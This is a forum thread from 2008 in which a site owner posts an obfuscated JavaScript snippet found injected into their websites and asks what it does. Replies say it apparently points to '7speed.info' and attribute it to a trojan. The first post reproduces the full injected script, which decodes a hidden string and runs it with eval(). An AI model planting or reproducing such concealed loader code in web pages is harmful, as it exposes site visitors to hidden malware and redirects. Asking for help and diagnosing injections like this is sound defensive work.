Results 1 to 8 of 8

Thread: Mystery Javascript

  1. #1
    Join Date
    Apr 2008
    Posts
    5
    Thanks
    4
    Thanked 0 Times in 0 Posts

    Default Mystery Javascript

    This may not be the right venue, but people here have been so helpful in the past. I had a few sites go down and didn't know why. Found the following code in all three with the issue...does anyone know what this does or if it looks familiar? any help would be appreciated.

    <script language=JavaScript> function fwbnb25(z){var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,48,29,20,53,33,46,39,1,38,0,0,0,0,0,0,25,41,14,42,15,34,28,52,59,22,11,26,7,19,45,18,8,5,60,3,40,58,57,49,55,6,16 ,0,0,0,0,0,0,47,44,24,31,4,30,2,13,37,50,23,27,43,21,9,12,51,17,56,61,54,32,10,36,35,62);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(174^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}fwbnb25('@dp1wLFu_uNuDmtu2D@ECLp1J7ciwLFqlDRj_mhv@qtWKab5owVWPqtqSaby_0R1JDojhy@7BuhXhDoyYmNufM@v89@XfaRjwSsW_yF18C2vr9c5y0buYSPX8ah1wls sDmNW_jtq_mF1Sls5e6A9fUV5Q9Pjhy@7oIcEpUcuLmbuYDV7lUAyYaRWolbuMuo9BuNukJRjMjTjLXNXg0R43gF1_apyZw@vLypXDDRjZ9s5')</script>

  2. #2
    Join Date
    Jun 2008
    Posts
    589
    Thanks
    13
    Thanked 54 Times in 54 Posts
    Blog Entries
    1

    Default

    Man, if your sites go down, take the code out! (That is unless you need the code) ... Please provide a link.

    -magicyte

  3. The Following User Says Thank You to magicyte For This Useful Post:

    rlfinc (10-29-2008)

  4. #3
    Join Date
    Jun 2005
    Location
    英国
    Posts
    11,876
    Thanks
    1
    Thanked 180 Times in 172 Posts
    Blog Entries
    2

    Default

    It seems to be attempting to be an ad pointing to '7speed.info' (which doesn't exist).
    Twey | I understand English | 日本語が分かります | mi jimpe fi le jbobau | mi esperanton komprenas | je comprends français | entiendo español | tôi ít hiểu tiếng Việt | ich verstehe ein bisschen Deutsch | beware XHTML | common coding mistakes | tutorials | various stuff | argh PHP!

  5. The Following User Says Thank You to Twey For This Useful Post:

    rlfinc (10-29-2008)

  6. #4
    Join Date
    Apr 2008
    Posts
    5
    Thanks
    4
    Thanked 0 Times in 0 Posts

    Default

    Found the issue. A trojan from an upload point hitched a ride and spidered out. Sucks, but fixable. Thanks for the responses.

  7. #5
    Join Date
    Oct 2008
    Posts
    1
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    Can I ask you where in your website you found this code? I just did a search on 7speed.info because it came up on my site, and found this thread. I think I may be infected with the same thing, but I'm not sure where on my site to look.

    Thank you!

  8. #6
    Join Date
    Jul 2006
    Posts
    497
    Thanks
    8
    Thanked 70 Times in 70 Posts

    Default

    Where is your site, Barry? And what pages show the problem?
    -- Chris
    informal JavaScript student of Douglas Crockford
    I like wikis - a lot.

  9. #7
    Join Date
    Nov 2007
    Posts
    24
    Thanks
    2
    Thanked 0 Times in 0 Posts

    Default

    it's only a mystery ..and i like it la la la la
    Last edited by tetrix; 11-02-2008 at 04:16 PM. Reason: edited!

  10. #8
    Join Date
    Jun 2008
    Posts
    589
    Thanks
    13
    Thanked 54 Times in 54 Posts
    Blog Entries
    1

    Default

    *mystery

    -- Jesdisciple is serious. I am as well.

    -magicyte

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •